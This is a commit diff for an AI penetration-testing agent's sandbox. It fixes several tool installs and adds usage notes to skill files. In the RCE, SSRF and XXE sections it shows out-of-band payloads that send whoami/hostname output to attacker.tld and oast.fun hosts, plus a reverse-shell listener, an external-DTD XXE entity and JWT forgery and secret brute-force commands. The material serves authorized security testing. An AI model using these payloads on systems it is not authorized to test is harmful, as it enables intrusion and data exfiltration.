Surface the previously-undocumented sandbox tools and unbreak two of them
The image ships 15 tools (jwt_tool, interactsh-client, arjun, dirsearch, gospider, wafw00f, retire, eslint, jshint, js-beautify, JS-Snooper, jsniper.sh, vulnx, ncat, uv) that the always-loaded skills never name with usage guidance — agents could discover them via the environment catalog but had no when/how. Add concise mentions in the natural home for each: jwt_tool in the JWT skill, interactsh-client in the OAST sections of SSRF/XXE/RCE, arjun in IDOR recon, dirsearch as the broad alternate in the ffuf skill, gospider + the JS scrapers in katana, wafw00f next to httpx, retire/eslint/jshint/js-beautify as a new JavaScript-Side Coverage block in the SAST playbook, uv in python, vulnx in the deep scan-mode CVE bullet, ncat in a new RCE Tooling block. Audit also turned up three real breakages along the way: - jwt_tool's shebang resolves to /usr/bin/python3 but its dependencies live in /app/.venv, so every invocation died with ModuleNotFoundError: ratelimit. Replace the bare symlink with a wrapper that execs /app/.venv/bin/python against the real script. - dirsearch's pipx venv ended up with setuptools 82, which dropped pkg_resources — startup failed before parsing args. Pin the inject to setuptools<81. - ESLint's --no-eslintrc flag was removed in v9; the surviving --no-config-lookup covers it. Drop the dead flag from the SAST command block. Also corrected the JS-Snooper / jsniper.sh entry in katana.md — both take a bare domain and run their own JS discovery internally, not the JS URLs Katana already harvested.
This commit is contained in:
@@ -75,7 +75,7 @@ RUN nuclei -update-templates
|
|||||||
|
|
||||||
RUN pipx install arjun && \
|
RUN pipx install arjun && \
|
||||||
pipx install dirsearch && \
|
pipx install dirsearch && \
|
||||||
pipx inject dirsearch setuptools && \
|
pipx inject dirsearch 'setuptools<81' && \
|
||||||
pipx install wafw00f
|
pipx install wafw00f
|
||||||
|
|
||||||
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
|
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
|
||||||
@@ -193,7 +193,11 @@ USER pentester
|
|||||||
RUN python3 -m venv /app/.venv && \
|
RUN python3 -m venv /app/.venv && \
|
||||||
/app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \
|
/app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \
|
||||||
/app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \
|
/app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \
|
||||||
ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool
|
printf '%s\n' \
|
||||||
|
'#!/bin/bash' \
|
||||||
|
'exec /app/.venv/bin/python /home/pentester/tools/jwt_tool/jwt_tool.py "$@"' \
|
||||||
|
> /home/pentester/.local/bin/jwt_tool && \
|
||||||
|
chmod +x /home/pentester/.local/bin/jwt_tool
|
||||||
|
|
||||||
COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py
|
COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py
|
||||||
ENV PYTHONPATH=/opt/strix-python
|
ENV PYTHONPATH=/opt/strix-python
|
||||||
|
|||||||
@@ -121,6 +121,23 @@ trivy fs --scanners vuln,misconfig --timeout 30m --offline-scan \
|
|||||||
--format json --output /workspace/.strix-source-aware/trivy-fs.json . || true
|
--format json --output /workspace/.strix-source-aware/trivy-fs.json . || true
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## JavaScript-Side Coverage
|
||||||
|
|
||||||
|
For frontends and Node services, layer these on top of the language-agnostic
|
||||||
|
passes above:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
retire --path . --outputformat json --outputpath /workspace/.strix-source-aware/retire.json || true
|
||||||
|
eslint --no-config-lookup --rule '{"no-eval":2,"no-implied-eval":2}' \
|
||||||
|
-f json -o /workspace/.strix-source-aware/eslint.json . || true
|
||||||
|
```
|
||||||
|
|
||||||
|
When you hit a minified bundle, run `js-beautify <file>` for a readable
|
||||||
|
view before greppping — and use `jshint --reporter=unix <file>` as a
|
||||||
|
lighter syntax/anti-pattern check when ESLint is over-eager. The
|
||||||
|
`JS-Snooper` / `jsniper.sh` tools (in `katana.md`) are the right next
|
||||||
|
step to mine those bundles for endpoint candidates.
|
||||||
|
|
||||||
## Converting Static Signals Into Exploits
|
## Converting Static Signals Into Exploits
|
||||||
|
|
||||||
1. Rank candidates by impact and exploitability.
|
1. Rank candidates by impact and exploitability.
|
||||||
|
|||||||
@@ -30,6 +30,8 @@ Thorough understanding before exploitation. Test every parameter, every endpoint
|
|||||||
- Review file handling: upload, download, processing
|
- Review file handling: upload, download, processing
|
||||||
- Understand the deployment model and infrastructure assumptions
|
- Understand the deployment model and infrastructure assumptions
|
||||||
- Check all dependency versions and repository risks against CVE/misconfiguration data
|
- Check all dependency versions and repository risks against CVE/misconfiguration data
|
||||||
|
- For quick CVE lookups on a named product/version, use `vulnx search <query>`
|
||||||
|
(ProjectDiscovery's CVE database) before falling back to web_search
|
||||||
|
|
||||||
**Blackbox (no source)**
|
**Blackbox (no source)**
|
||||||
- Exhaustive subdomain enumeration with multiple sources and tools
|
- Exhaustive subdomain enumeration with multiple sources and tools
|
||||||
|
|||||||
@@ -64,3 +64,9 @@ Failure recovery:
|
|||||||
|
|
||||||
If uncertain, query web_search with:
|
If uncertain, query web_search with:
|
||||||
`site:github.com/ffuf/ffuf <flag> README`
|
`site:github.com/ffuf/ffuf <flag> README`
|
||||||
|
|
||||||
|
Alternate tool for path/file enumeration: `dirsearch -u <url> -e php,html,js,json`
|
||||||
|
ships with curated wordlists, sane defaults, and built-in recursion. Reach
|
||||||
|
for ffuf when you need surgical fuzzing of any input position (header,
|
||||||
|
body, vhost) or precise filter control; reach for dirsearch for a quick
|
||||||
|
broad sweep with no setup.
|
||||||
|
|||||||
@@ -75,3 +75,8 @@ Failure recovery:
|
|||||||
|
|
||||||
If uncertain, query web_search with:
|
If uncertain, query web_search with:
|
||||||
`site:docs.projectdiscovery.io httpx <flag> usage`
|
`site:docs.projectdiscovery.io httpx <flag> usage`
|
||||||
|
|
||||||
|
Companion: `wafw00f <url>` fingerprints the WAF/CDN in front of a target
|
||||||
|
(Cloudflare, Akamai, AWS WAF, etc.). Run it once after httpx confirms the
|
||||||
|
host is live — the WAF identity decides whether to throttle fuzzing,
|
||||||
|
swap to evasion payload sets, or assume blocking and route differently.
|
||||||
|
|||||||
@@ -74,3 +74,14 @@ Failure recovery:
|
|||||||
|
|
||||||
If uncertain, query web_search with:
|
If uncertain, query web_search with:
|
||||||
`site:docs.projectdiscovery.io katana <flag> usage`
|
`site:docs.projectdiscovery.io katana <flag> usage`
|
||||||
|
|
||||||
|
Complementary crawlers / JS endpoint extractors in the sandbox:
|
||||||
|
- `gospider -s https://target.tld -d 3 -c 10 -t 20` — alternate crawler;
|
||||||
|
picks up things Katana misses on weird sites; use it as a second
|
||||||
|
pass when Katana output looks thin.
|
||||||
|
- `~/tools/JS-Snooper/js_snooper.sh <domain>` and
|
||||||
|
`~/tools/jsniper.sh/jsniper.sh <domain>` — both take a bare domain and
|
||||||
|
run their own JS-file discovery internally (jsniper drives httpx +
|
||||||
|
katana + nuclei file templates). Reach for them when you want a quick
|
||||||
|
"find endpoints/keys/secrets in any JS this domain serves" sweep
|
||||||
|
without wiring it up yourself.
|
||||||
|
|||||||
@@ -88,3 +88,13 @@ For iterative exploit work, put code in a file:
|
|||||||
2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`.
|
2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`.
|
||||||
3. Edit and rerun until the proof-of-concept is reliable.
|
3. Edit and rerun until the proof-of-concept is reliable.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Installing extra packages
|
||||||
|
|
||||||
|
The sandbox's Python lives in `/app/.venv`. To add a one-off dependency
|
||||||
|
for an exploit script, use `uv` (already in the image and much faster
|
||||||
|
than pip):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
uv pip install --python /app/.venv/bin/python <package>
|
||||||
|
```
|
||||||
|
|||||||
@@ -151,6 +151,16 @@ JWT/OIDC failures often enable token forgery, token confusion, cross-service acc
|
|||||||
9. Favor minimal PoCs that clearly show cross-context acceptance and durable access
|
9. Favor minimal PoCs that clearly show cross-context acceptance and durable access
|
||||||
10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each
|
10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each
|
||||||
|
|
||||||
|
## Tooling
|
||||||
|
|
||||||
|
- `jwt_tool -t <url> -rh "Authorization: Bearer <token>" -M at` runs the
|
||||||
|
full attack matrix (alg=none, RS→HS confusion, kid injection, claim
|
||||||
|
edits) and reports which mutations the server still accepts.
|
||||||
|
- `jwt_tool <token> -C -d <wordlist>` brute-forces HMAC secrets when an
|
||||||
|
HS-family signature is in use.
|
||||||
|
- Use `jwt_tool` to mint a token under a key you control once you find an
|
||||||
|
acceptance path (kid/jku/x5u/jwk), then replay via `repeat_request`.
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.
|
Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.
|
||||||
|
|||||||
@@ -47,6 +47,9 @@ Object-level authorization failures (BOLA/IDOR) lead to cross-account data expos
|
|||||||
**Parameter Analysis**
|
**Parameter Analysis**
|
||||||
- Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state)
|
- Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state)
|
||||||
- Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation
|
- Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation
|
||||||
|
- Find undocumented params with `arjun -u <url>` (GET) or `arjun -u <url> -m POST` —
|
||||||
|
surfaces hidden filters like `?include_deleted=1`, `?as_user=…`, `?owner_id=…`
|
||||||
|
that frequently widen the IDOR surface.
|
||||||
|
|
||||||
**Enumeration Techniques**
|
**Enumeration Techniques**
|
||||||
- Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars
|
- Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars
|
||||||
|
|||||||
@@ -41,14 +41,18 @@ Remote code execution leads to full server control when input reaches code execu
|
|||||||
|
|
||||||
### OAST
|
### OAST
|
||||||
|
|
||||||
|
Use `interactsh-client -v` in the sandbox to mint a unique callback
|
||||||
|
domain (`*.oast.fun`); substitute it for `attacker.tld` below. Each
|
||||||
|
invocation prints inbound DNS/HTTP hits to stdout in real time.
|
||||||
|
|
||||||
**DNS**
|
**DNS**
|
||||||
```bash
|
```bash
|
||||||
nslookup $(whoami).x.attacker.tld
|
nslookup $(whoami).xyz.oast.fun
|
||||||
```
|
```
|
||||||
|
|
||||||
**HTTP**
|
**HTTP**
|
||||||
```bash
|
```bash
|
||||||
curl https://attacker.tld/$(hostname)
|
curl https://xyz.oast.fun/$(hostname)
|
||||||
```
|
```
|
||||||
|
|
||||||
### Output-Based
|
### Output-Based
|
||||||
@@ -233,6 +237,13 @@ pop graphic-context
|
|||||||
6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies
|
6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies
|
||||||
7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops
|
7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops
|
||||||
|
|
||||||
|
## Tooling
|
||||||
|
|
||||||
|
- Reverse-shell listener: `ncat -lvnp 4444` (in the sandbox; `ncat` is the
|
||||||
|
netcat variant that ships in the image). Pair with a one-shot shell
|
||||||
|
payload only when OAST + selective reads are insufficient — never
|
||||||
|
drop a persistent shell when a single targeted command will prove it.
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.
|
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.
|
||||||
|
|||||||
@@ -123,7 +123,11 @@ Server-Side Request Forgery enables the server to reach networks and services th
|
|||||||
|
|
||||||
## Blind SSRF
|
## Blind SSRF
|
||||||
|
|
||||||
- Use OAST (DNS/HTTP) to confirm egress
|
- Use OAST (DNS/HTTP) to confirm egress. `interactsh-client -v` (running
|
||||||
|
in the sandbox) gives you a unique `*.oast.fun` domain; embed it in
|
||||||
|
the URL parameter and watch the interactsh stdout for the inbound
|
||||||
|
DNS/HTTP hit. Each invocation yields a fresh domain — restart between
|
||||||
|
payloads if you need to correlate hits to a specific request.
|
||||||
- Derive internal reachability from timing, response size, TLS errors, and ETag differences
|
- Derive internal reachability from timing, response size, TLS errors, and ETag differences
|
||||||
- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
|
- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
|
||||||
|
|
||||||
|
|||||||
@@ -49,6 +49,9 @@ XML External Entity injection is a parser-level failure that enables local file
|
|||||||
|
|
||||||
- Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks
|
- Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks
|
||||||
- Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens)
|
- Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens)
|
||||||
|
- Use `interactsh-client -v` for the callback domain. Reference it as the
|
||||||
|
external DTD host (e.g. `<!ENTITY % ex SYSTEM "http://xyz.oast.fun/x.dtd">`)
|
||||||
|
and read the DNS/HTTP hit on the interactsh stdout.
|
||||||
|
|
||||||
### Timing
|
### Timing
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user